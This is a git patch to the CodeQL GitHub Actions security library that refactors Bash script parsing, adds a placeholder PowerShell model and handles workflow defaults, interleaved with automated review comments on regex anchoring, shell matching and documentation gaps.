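Review bot: In the new `getCommand(int i)`, `not result.regexpMatch("^[a-zA-Z0-9\\-_]+=")` does not exclude variable declarations, because `regexpMatch` must match the whole string and this pattern stops at the `=`. Only a command that is exactly `NAME=` is filtered out. The `PoisonableSteps.qll` change in this same commit appends `.*` for that reason, and the same is needed here: `not result.regexpMatch("^[a-zA-Z0-9\\-_]+=.*")`. Separately, `cmdProducer`, `doCmdRestoreQuotedStrings`, `restoredCmdQuotedStringLineProducer` and `doCmdRestoreCmdSubstitutions` repeat the `Stmt` chain with only the separator set changed, which makes the two copies easy to let drift apart. The enclosing `RunImpl` class starts and ends outside the hunk.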
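Review bot: Anchoring the match with `regexpMatch("^" + regexp + ".*")` means a step is reported only when the parsed command text begins with one of the `poisonableCommandsDataModel` patterns. A command run through a wrapper or an explicit path is then no longer matched unless the patterns themselves allow for such a prefix, which is not visible here. For a security query that is a possible source of false negatives, so a test workflow covering a prefixed command, checked in `ql/test/library-tests/poisonable_steps.expected`, would pin the intended behaviour. A comment on the line, such as `// match only at the start of a parsed command, to avoid hits inside arguments`, would record why `regexpFind` was replaced. `PoisonableCommandStep` starts outside the hunk.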
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 14 Oct 2024 12:04:20 +0200 Subject: [PATCH 0582/1267] Refactor Script support --- ql/lib/codeql/actions/Ast.qll | 48 ++- ql/lib/codeql/actions/Bash.qll | 398 +++++++++++++++--- ql/lib/codeql/actions/Helper.qll | 1 + ql/lib/codeql/actions/PowerShell.qll | 50 +++ ql/lib/codeql/actions/ast/internal/Ast.qll | 374 +++++----------- .../actions/controlflow/internal/Cfg.qll | 2 +- .../codeql/actions/dataflow/FlowSources.qll | 20 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 18 +- ql/lib/codeql/actions/dataflow/TaintSteps.qll | 6 +- .../security/ArgumentInjectionQuery.qll | 20 +- .../security/ArtifactPoisoningQuery.qll | 60 ++- .../actions/security/CodeInjectionQuery.qll | 4 +- .../codeql/actions/security/ControlChecks.qll | 4 +- .../security/EnvPathInjectionQuery.qll | 29 +- .../actions/security/EnvVarInjectionQuery.qll | 29 +- .../security/OutputClobberingQuery.qll | 117 +++-- .../actions/security/PoisonableSteps.qll | 13 +- .../security/UntrustedCheckoutQuery.qll | 16 +- .../.github/workflows/commands.yml | 20 +- ql/test/library-tests/commands.expected | 34 +- ql/test/library-tests/commands.ql | 2 +- .../library-tests/poisonable_steps.expected | 2 - ql/test/library-tests/test.expected | 1 + .../CWE-074/.github/workflows/output1.yml | 1 + .../actions/download-artifact-2/action.yaml | 32 ++ .../actions/download-artifact/action.yaml | 32 ++ .../.github/workflows/artifactpoisoning51.yml | 20 + .../.github/workflows/artifactpoisoning52.yml | 26 ++ .../.github/workflows/artifactpoisoning53.yml | 27 ++ .../.github/workflows/artifactpoisoning91.yml | 29 ++ .../.github/workflows/artifactpoisoning92.yml | 29 ++ .../CWE-077/EnvVarInjectionCritical.expected | 20 + .../CWE-077/EnvVarInjectionMedium.expected | 15 + .../ArtifactPoisoningCritical.expected | 12 - .../CWE-829/ArtifactPoisoningMedium.expected | 9 - 35 files changed, 1001 insertions(+), 519 deletions(-) create mode 100644 ql/lib/codeql/actions/PowerShell.qll create mode 
100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact-2/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/actions/download-artifact/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning51.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning52.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning53.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning91.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/artifactpoisoning92.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index cc29ceffe53..620f74e25bb 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -22,6 +22,10 @@ class AstNode instanceof AstNodeImpl { CompositeAction getEnclosingCompositeAction() { result = super.getEnclosingCompositeAction() } Expression getInScopeEnvVarExpr(string name) { result = super.getInScopeEnvVarExpr(name) } + + ScalarValue getInScopeDefaultValue(string name, string prop) { + result = super.getInScopeDefaultValue(name, prop) + } } class ScalarValue extends AstNode instanceof ScalarValueImpl { @@ -121,6 +125,10 @@ class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { class Input extends AstNode instanceof InputImpl { } +class Default extends AstNode instanceof DefaultsImpl { + ScalarValue getValue(string name, string prop) { result = super.getValue(name, prop) } +} + class Outputs extends AstNode instanceof OutputsImpl { Expression getAnOutputExpr() { result = super.getAnOutputExpr() } 
@@ -286,14 +294,18 @@ class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ class Run extends Step instanceof RunImpl { - string getScript() { result = super.getScript() } - - ScalarValue getScriptScalar() { result = super.getScriptScalar() } + ShellScript getScript() { result = super.getScript() } Expression getAnScriptExpr() { result = super.getAnScriptExpr() } string getWorkingDirectory() { result = super.getWorkingDirectory() } + string getShell() { result = super.getShell() } +} + +class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl { + string getRawScript() { result = super.getRawScript() } + string getStmt(int i) { result = super.getStmt(i) } string getAStmt() { result = super.getAStmt() } 
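Review bot: `class ShellScript extends ScalarValueImpl instanceof ShellScriptImpl` makes the public class a subtype of the internal `ScalarValueImpl`, while the other wrappers in this file extend the public type (`class Run extends Step instanceof RunImpl`, `class ScalarValue extends AstNode instanceof ScalarValueImpl`). Unless that is deliberate, `class ShellScript extends ScalarValue instanceof ShellScriptImpl` keeps the internal types out of the public API. `Run.getScript()` now returns a `ShellScript` instead of a `string` and `getScriptScalar()` is removed, so a QLDoc line on `getScript()` and on the new `getShell()` would help callers that still expect the raw text. `ShellScript` continues outside the hunk.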
@@ -302,19 +314,23 @@ class Run extends Step instanceof RunImpl { string getACommand() { result = super.getACommand() } - predicate getAssignment(int i, string name, string value) { super.getAssignment(i, name, value) } + string getFileReadCommand(int i) { result = super.getFileReadCommand(i) } - predicate getAnAssignment(string name, string value) { super.getAnAssignment(name, value) } + string getAFileReadCommand() { result = super.getAFileReadCommand() } - predicate getAWriteToGitHubEnv(string name, string value) { - super.getAWriteToGitHubEnv(name, value) + predicate getAssignment(int i, string name, string data) { super.getAssignment(i, name, data) } + + predicate getAnAssignment(string name, string data) { super.getAnAssignment(name, data) } + + predicate getAWriteToGitHubEnv(string name, string data) { + super.getAWriteToGitHubEnv(name, data) } - predicate getAWriteToGitHubOutput(string name, string value) { - super.getAWriteToGitHubOutput(name, value) + predicate getAWriteToGitHubOutput(string name, string data) { + super.getAWriteToGitHubOutput(name, data) } - predicate getAWriteToGitHubPath(string value) { super.getAWriteToGitHubPath(value) } + predicate getAWriteToGitHubPath(string data) { super.getAWriteToGitHubPath(data) } predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { super.getAnEnvReachingGitHubOutputWrite(var, output_field) 
@@ -331,6 +347,18 @@ class Run extends Step instanceof RunImpl { predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { super.getACmdReachingGitHubEnvWrite(cmd, output_field) } + + predicate getAnEnvReachingGitHubPathWrite(string var) { + super.getAnEnvReachingGitHubPathWrite(var) + } + + predicate getACmdReachingGitHubPathWrite(string cmd) { super.getACmdReachingGitHubPathWrite(cmd) } + + predicate fileToGitHubEnv(string path) { super.fileToGitHubEnv(path) } + + predicate fileToGitHubOutput(string path) { super.fileToGitHubOutput(path) } + + predicate fileToGitHubPath(string path) { super.fileToGitHubPath(path) } } abstract class SimpleReferenceExpression extends AstNode instanceof SimpleReferenceExpressionImpl { diff --git a/ql/lib/codeql/actions/Bash.qll b/ql/lib/codeql/actions/Bash.qll index fc9a75319eb..541ab437db2 100644 --- a/ql/lib/codeql/actions/Bash.qll +++ b/ql/lib/codeql/actions/Bash.qll 
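Review bot: The new `fileToGitHubEnv`, `fileToGitHubOutput` and `fileToGitHubPath` predicates take a `path` argument whose meaning cannot be read from the signature. It could be the file whose content reaches the special file, or something else decided in `ShellScriptImpl`, which is not visible here. These predicates feed the env, output and path injection queries, so each should get a QLDoc line stating what `path` denotes and when the predicate holds. The same applies to `getAnEnvReachingGitHubPathWrite` and `getACmdReachingGitHubPathWrite`, which are added without documentation. The enclosing class starts outside the hunk.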
@@ -1,7 +1,303 @@ private import codeql.actions.Ast -private import codeql.Locations -import codeql.actions.config.Config -private import codeql.actions.security.ControlChecks + +class BashShellScript extends ShellScript { + BashShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("bash%") + ) + } + + private string lineProducer(int i) { + result = this.getRawScript().regexpReplaceAll("\\\\\\s*\n", "").splitAt("\n", i) + } + + private predicate cmdSubstitutionReplacement(string cmdSubs, string id, int k) { + exists(string line | line = this.lineProducer(k) | + exists(int i, int j | + cmdSubs = + // $() cmd substitution + line.regexpFind("\\$\\((?:[^()]+|\\((?:[^()]+|\\([^()]*\\))*\\))*\\)", i, j) + .regexpReplaceAll("^\\$\\(", "") + .regexpReplaceAll("\\)$", "") and + id = "cmdsubs:" + k + ":" + i + ":" + j + ) + or + exists(int i, int j | + // `...` cmd substitution + cmdSubs = + line.regexpFind("\\`[^\\`]+\\`", i, j) + .regexpReplaceAll("^\\`", "") + .regexpReplaceAll("\\`$", "") and + id = "cmd:" + k + ":" + i + ":" + j + ) + ) + } + + private predicate rankedCmdSubstitutionReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.cmdSubstitutionReplacement(old2, _, _) | old2) and + this.cmdSubstitutionReplacement(old, new, _) + } + + private predicate doReplaceCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.lineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string cmdSubstitutedLineProducer(int i) { + // script lines where any command substitution has been replaced with a unique placeholder + result = + max(int round, string new | + this.doReplaceCmdSubstitutions(i, round, _, new) + | + new 
order by round + ) + or + this.cmdSubstitutionReplacement(result, _, i) + } + + private predicate quotedStringReplacement(string quotedStr, string id) { + exists(string line, int k | line = this.cmdSubstitutedLineProducer(k) | + exists(int i, int j | + // double quoted string + quotedStr = line.regexpFind("\"((?:[^\"\\\\]|\\\\.)*)\"", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + or + exists(int i, int j | + // single quoted string + quotedStr = line.regexpFind("'((?:\\\\.|[^'\\\\])*)'", i, j) and + id = + "qstr:" + k + ":" + i + ":" + j + ":" + quotedStr.length() + ":" + + quotedStr.regexpReplaceAll("[^a-zA-Z0-9]", "") + ) + ) + } + + private predicate rankedQuotedStringReplacements(int i, string old, string new) { + old = rank[i](string old2 | this.quotedStringReplacement(old2, _) | old2) and + this.quotedStringReplacement(old, new) + } + + private predicate doReplaceQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdSubstitutedLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doReplaceQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(target, replacement) + ) + } + + private string quotedStringLineProducer(int i) { + result = + max(int round, string new | this.doReplaceQuotedStrings(i, round, _, new) | new order by round) + } + + private string stmtProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::splitSeparator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::splitSeparator()) > -1 + } + + private predicate doStmtRestoreQuotedStrings(int 
line, int round, string old, string new) { + round = 0 and + old = this.stmtProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredStmtQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doStmtRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doStmtRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredStmtQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doStmtRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + override string getStmt(int i) { + result = + max(int round, string new | + this.doStmtRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + override string getAStmt() { result = this.getStmt(_) } + + private string cmdProducer(int i) { + result = this.quotedStringLineProducer(i).splitAt(Bash::separator()).trim() and + // when splitting the line with a separator that is not present, the result is the original line which may contain other separators + // we only one the split parts that do not contain any of the separators + not result.indexOf(Bash::separator()) > -1 + } + + private predicate doCmdRestoreQuotedStrings(int line, int round, string old, string new) { + round = 0 and + old = this.cmdProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreQuotedStrings(line, round - 1, old, middle) and + this.rankedQuotedStringReplacements(round, 
target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + private string restoredCmdQuotedStringLineProducer(int i) { + result = + max(int round, string new | + this.doCmdRestoreQuotedStrings(i, round, _, new) + | + new order by round + ) + } + + private predicate doCmdRestoreCmdSubstitutions(int line, int round, string old, string new) { + round = 0 and + old = this.restoredCmdQuotedStringLineProducer(line) and + new = old + or + round > 0 and + exists(string middle, string target, string replacement | + this.doCmdRestoreCmdSubstitutions(line, round - 1, old, middle) and + this.rankedCmdSubstitutionReplacements(round, target, replacement) and + new = middle.replaceAll(replacement, target) + ) + } + + string getCmd(int i) { + result = + max(int round, string new | + this.doCmdRestoreCmdSubstitutions(i, round, _, new) + | + new order by round + ) + } + + string getACmd() { result = this.getCmd(_) } + + override string getCommand(int i) { + result = this.getCmd(i) and + // exclude variable declarations + not result.regexpMatch("^[a-zA-Z0-9\\-_]+=") and + // exclude the following keywords + not result = + [ + "", "for", "in", "do", "done", "if", "then", "else", "elif", "fi", "while", "until", "case", + "esac", "{", "}" + ] + } + + override string getACommand() { result = this.getCommand(_) } + + override string getFileReadCommand(int i) { + result = this.getStmt(i) and + result.matches(Bash::fileReadCommand() + "%") + } + + override string getAFileReadCommand() { result = this.getFileReadCommand(_) } + + override predicate getAssignment(int i, string name, string data) { + exists(string stmt | + stmt = this.getStmt(i) and + name = stmt.regexpCapture("^([a-zA-Z0-9\\-_]+)=.*", 1) and + data = stmt.regexpCapture("^[a-zA-Z0-9\\-_]+=(.*)", 1) + ) + } + + override predicate getAnAssignment(string name, string data) { this.getAssignment(_, name, data) } + + override predicate getAWriteToGitHubEnv(string name, string data) { + exists(string raw | + 
Bash::extractFileWrite(this.getRawScript(), "GITHUB_ENV", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubOutput(string name, string data) { + exists(string raw | + Bash::extractFileWrite(this.getRawScript(), "GITHUB_OUTPUT", raw) and + Bash::extractVariableAndValue(raw, name, data) + ) + } + + override predicate getAWriteToGitHubPath(string data) { + Bash::extractFileWrite(this.getRawScript(), "GITHUB_PATH", data) + } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_OUTPUT", output_field) + } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_PATH", _) + } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_PATH", _) + } + + override predicate fileToGitHubEnv(string path) { + Bash::fileToFileWrite(this, "GITHUB_ENV", path) + } + + override predicate fileToGitHubOutput(string path) { + Bash::fileToFileWrite(this, "GITHUB_OUTPUT", path) + } + + override predicate fileToGitHubPath(string path) { + Bash::fileToFileWrite(this, "GITHUB_PATH", path) + } +} module Bash { string stmtSeparator() { result = ";" } 
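Review bot: The `BashShellScript()` characteristic predicate selects scripts with `run.getShell().matches("bash%")`, so a step whose shell is `sh`, or a path or template such as `/bin/bash -e {0}`, is not a `BashShellScript`. Going by the rest of this commit, such a script has no implementation behind the abstract `ShellScriptImpl` predicates, so the GITHUB_ENV, GITHUB_OUTPUT and GITHUB_PATH write predicates would return nothing for it, whereas the removed `RunImpl` code parsed every `run` script. If that loss of coverage is not intended, widen the test, for example `run.getShell().regexpMatch("(\\S*/)?(ba)?sh(\\s.*)?")`, and state in the class QLDoc which shells are treated as Bash-compatible.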
@@ -23,7 +319,7 @@ module Bash { result = pipeSeparator() } - string partialFileContentCommand() { result = ["cat", "jq", "yq", "tail", "head"] } + string fileReadCommand() { result = ["<", "cat", "jq", "yq", "tail", "head"] } /** Checks if expr is a bash command substitution */ bindingset[expr] @@ -133,8 +429,7 @@ module Bash { string script, string cmd, string file, string content, string filters ) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and + regexp = "(?i)(echo|printf)\\s*(.*?)\\s*(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*(\\S+)" and cmd = script.regexpCapture(regexp, 1) and file = trimQuotes(script.regexpCapture(regexp, 5)) and filters = "" and @@ -145,13 +440,12 @@ module Bash { bindingset[script] predicate singleLineWorkflowCmd(string script, string cmd, string key, string value) { exists(string regexp | - regexp = - "(?i)(echo|printf|write-output)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(set-[a-z]+)\\s*name\\s*=\\s*(.*?)::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = script.regexpCapture(regexp, 4) and value = trimQuotes(script.regexpCapture(regexp, 5)) or - regexp = "(?i)(echo|printf|write-output)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and + regexp = "(?i)(echo|printf)\\s*(['|\"])?::(add-[a-z]+)\\s*::(.*)" and cmd = script.regexpCapture(regexp, 3) and key = "" and value = trimQuotes(script.regexpCapture(regexp, 4)) 
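Review bot: `fileReadCommand()` is now used as a bare prefix: `getFileReadCommand` in `BashShellScript` tests `result.matches(Bash::fileReadCommand() + "%")`, so a statement that merely starts with those letters (`catalog-sync`, `headless-chrome`, `jqfmt`) counts as a file read. The removed `outputsPartialFileContent` required a space after the command name (`Bash::partialFileContentCommand() + " "`), which kept the match on a word boundary. Consider `result.regexpMatch("(<|(cat|jq|yq|tail|head)\\s).*")` in `getFileReadCommand` instead. The `Bash` module body continues outside this hunk.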
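Review bot: Dropping `write-output` from this regex, and from both `singleLineWorkflowCmd` patterns in the next hunk, removes the only PowerShell write form these predicates recognised, while the new `PowerShellScript` class in PowerShell.qll implements every predicate as `none()`. Taken together, a `pwsh` step that writes to GITHUB_ENV, GITHUB_OUTPUT or GITHUB_PATH appears to produce no results after this commit. If the PowerShell model is to follow later, say so in a comment here, e.g. `// PowerShell writes (Write-Output ...) are not modelled yet; see PowerShellScript`, so the gap is visible to query authors. The predicate containing this regex starts above the hunk.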
@@ -262,57 +556,38 @@ module Bash { } /** Writes the content of the file specified by `path` into a file pointed to by `file_var` */ - predicate fileToFileWrite(Run run, string file_var, string path) { + predicate fileToFileWrite(BashShellScript script, string file_var, string path) { exists(string regexp, string stmt, string file_expr | regexp = "(?i)(cat)\\s*" + "((?:(?!<<|<<-)[^>\n])+)\\s*" + "(>>|>|\\s*\\|\\s*tee\\s*(-a|--append)?)\\s*" + "(\\S+)" and - stmt = run.getAStmt() and + stmt = script.getAStmt() and file_expr = trimQuotes(stmt.regexpCapture(regexp, 5)) and path = stmt.regexpCapture(regexp, 2) and containsParameterExpansion(file_expr, file_var, _, _) ) } - predicate fileToGitHubEnv(Run run, string path) { fileToFileWrite(run, "GITHUB_ENV", path) } - - predicate fileToGitHubOutput(Run run, string path) { fileToFileWrite(run, "GITHUB_OUTPUT", path) } - - predicate fileToGitHubPath(Run run, string path) { fileToFileWrite(run, "GITHUB_PATH", path) } - - bindingset[snippet] - predicate outputsPartialFileContent(Run run, string snippet) { - // e.g. 
- // echo FOO=`yq '.foo' foo.yml` >> $GITHUB_ENV - // echo "FOO=$(> $GITHUB_ENV - // yq '.foo' foo.yml >> $GITHUB_PATH - // cat foo.txt >> $GITHUB_PATH - exists(int i, string line, string cmd | - run.getStmt(i) = line and - line.indexOf(snippet.regexpReplaceAll("^\\$\\(", "").regexpReplaceAll("\\)$", "")) > -1 and - run.getCommand(i) = cmd and - cmd.indexOf(["<", Bash::partialFileContentCommand() + " "]) = 0 - ) - } - /** * Holds if the Run scripts contains an access to an environment variable called `var` * which value may get appended to the GITHUB_XXX special file */ - predicate envReachingGitHubFileWrite(Run run, string var, string file_var, string field) { + predicate envReachingGitHubFileWrite( + BashShellScript script, string var, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - envReachingRunExpr(run, var, file_write_value) + envReachingRunExpr(script, var, file_write_value) ) } @@ -321,11 +596,11 @@ module Bash { * Where the expression is a string captured from the Run's script. */ bindingset[expr] - predicate envReachingRunExpr(Run run, string var, string expr) { + predicate envReachingRunExpr(BashShellScript script, string var, string expr) { exists(string var2, string value2 | // VAR2=${VAR:-default} (var2=value2) // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and + script.getAnAssignment(var2, value2) and containsParameterExpansion(value2, var, _, _) and containsParameterExpansion(expr, var2, _, _) ) 
@@ -339,33 +614,42 @@ module Bash { * Holds if the Run scripts contains a command substitution (`cmd`) * which output may get appended to the GITHUB_XXX special file */ - predicate cmdReachingGitHubFileWrite(Run run, string cmd, string file_var, string field) { + predicate cmdReachingGitHubFileWrite( + BashShellScript script, string cmd, string file_var, string field + ) { exists(string file_write_value | ( file_var = "GITHUB_ENV" and - run.getAWriteToGitHubEnv(field, file_write_value) + script.getAWriteToGitHubEnv(field, file_write_value) or file_var = "GITHUB_OUTPUT" and - run.getAWriteToGitHubOutput(field, file_write_value) + script.getAWriteToGitHubOutput(field, file_write_value) or file_var = "GITHUB_PATH" and field = "PATH" and - run.getAWriteToGitHubPath(file_write_value) + script.getAWriteToGitHubPath(file_write_value) ) and - ( - // cmd output is assigned to a second variable (var2) and var2 reaches the file write - exists(string var2, string value2 | - // VAR2=$(cmd) - // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) - run.getAnAssignment(var2, value2) and - containsCmdSubstitution(value2, cmd) and - containsParameterExpansion(file_write_value, var2, _, _) - ) - or - // var reaches the file write directly - // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) - containsCmdSubstitution(file_write_value, cmd) - ) + cmdReachingRunExpr(script, cmd, file_write_value) ) } + + /** + * Holds if a command output is used, directly or indirectly, in a Run's step expression. + * Where the expression is a string captured from the Run's script. 
+ */ + bindingset[expr] + predicate cmdReachingRunExpr(BashShellScript script, string cmd, string expr) { + // cmd output is assigned to a second variable (var2) and var2 reaches the file write + exists(string var2, string value2 | + // VAR2=$(cmd) + // echo "FIELD=${VAR2:-default}" >> $GITHUB_ENV (field, file_write_value) + script.getAnAssignment(var2, value2) and + containsCmdSubstitution(value2, cmd) and + containsParameterExpansion(expr, var2, _, _) + ) + or + // var reaches the file write directly + // echo "FIELD=$(cmd)" >> $GITHUB_ENV (field, file_write_value) + containsCmdSubstitution(expr, cmd) + } } diff --git a/ql/lib/codeql/actions/Helper.qll b/ql/lib/codeql/actions/Helper.qll index ae4405a185b..fb6fdf2d74b 100644 --- a/ql/lib/codeql/actions/Helper.qll +++ b/ql/lib/codeql/actions/Helper.qll @@ -3,6 +3,7 @@ private import codeql.Locations private import codeql.actions.security.ControlChecks import codeql.actions.config.Config import codeql.actions.Bash +import codeql.actions.PowerShell bindingset[expr] string normalizeExpr(string expr) { diff --git a/ql/lib/codeql/actions/PowerShell.qll b/ql/lib/codeql/actions/PowerShell.qll new file mode 100644 index 00000000000..1727930c2a3 --- /dev/null +++ b/ql/lib/codeql/actions/PowerShell.qll 
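Review bot: The second branch of `cmdReachingRunExpr` is commented `// var reaches the file write directly`, but that branch involves no variable: it holds when `expr` itself contains the command substitution. The comments were carried over from `cmdReachingGitHubFileWrite` and still speak of the file write although the predicate now takes an arbitrary `expr`. Suggested wording: `// cmd output is assigned to var2 and var2 is expanded in expr` for the first branch and `// cmd output is used in expr directly` for the second.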
@@ -0,0 +1,50 @@ +private import codeql.actions.Ast + +class PowerShellScript extends ShellScript { + PowerShellScript() { + exists(Run run | + this = run.getScript() and + run.getShell().matches("pwsh%") + ) + } + + override string getStmt(int i) { none() } + + override string getAStmt() { none() } + + override string getCommand(int i) { none() } + + override string getACommand() { none() } + + override string getFileReadCommand(int i) { none() } + + override string getAFileReadCommand() { none() } + + override predicate getAssignment(int i, string name, string data) { none() } + + override predicate getAnAssignment(string name, string data) { none() } + + override predicate getAWriteToGitHubEnv(string name, string data) { none() } + + override predicate getAWriteToGitHubOutput(string name, string data) { none() } + + override predicate getAWriteToGitHubPath(string data) { none() } + + override predicate getAnEnvReachingGitHubOutputWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubOutputWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { none() } + + override predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { none() } + + override predicate getAnEnvReachingGitHubPathWrite(string var) { none() } + + override predicate getACmdReachingGitHubPathWrite(string cmd) { none() } + + override predicate fileToGitHubEnv(string path) { none() } + + override predicate fileToGitHubOutput(string path) { none() } + + override predicate fileToGitHubPath(string path) { none() } +} diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index eaf1ae871a9..43772a978c5 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll 
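Review bot: `PowerShellScript()` matches only `pwsh%`, so a step declaring `shell: powershell` (Windows PowerShell) is neither a `PowerShellScript` nor a `BashShellScript`. The class also has no QLDoc, and nothing tells a reader that every predicate being `none()` is a placeholder rather than a statement that PowerShell scripts perform no writes. Suggest `run.getShell().matches(["pwsh%", "powershell%"])` and a class comment such as `/** A run script executed by PowerShell. Not modelled yet: all predicates have no results. */`.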
@@ -62,6 +62,7 @@ private newtype TAstNode = n.lookup("jobs") instanceof YamlMapping } or TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TDefaultsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("defaults") = n) } or TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or @@ -141,6 +142,19 @@ abstract class AstNodeImpl extends TAstNode { env.getParentNode().getAChildNode*() = this ) } + + ScalarValueImpl getInScopeDefaultValue(string name, string prop) { + exists(DefaultsImpl dft | + this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + or + not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode()) and + exists(DefaultsImpl dft | + this.getEnclosingWorkflow().getNode().(YamlMapping).maps(_, dft.getNode()) and + result = dft.getValue(name, prop) + ) + } } class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { 
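Review bot: In `getInScopeDefaultValue` the workflow-level fallback is guarded by `not exists(DefaultsImpl dft | this.getEnclosingJob() = dft.getParentNode())`, which asks whether the job has any `defaults` block rather than whether that block sets `name`/`prop`. A job that only sets `defaults.run.working-directory` would therefore hide a workflow-level `defaults.run.shell`, and `getShell()` would fall back to `bash`; GitHub resolves defaults per setting, with the most specific one winning. The guard should test what the first branch computes: `not exists(DefaultsImpl dft | this.getEnclosingJob().getNode().(YamlMapping).maps(_, dft.getNode()) and exists(dft.getValue(name, prop))) and`. The enclosing class `AstNodeImpl` starts above the hunk.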
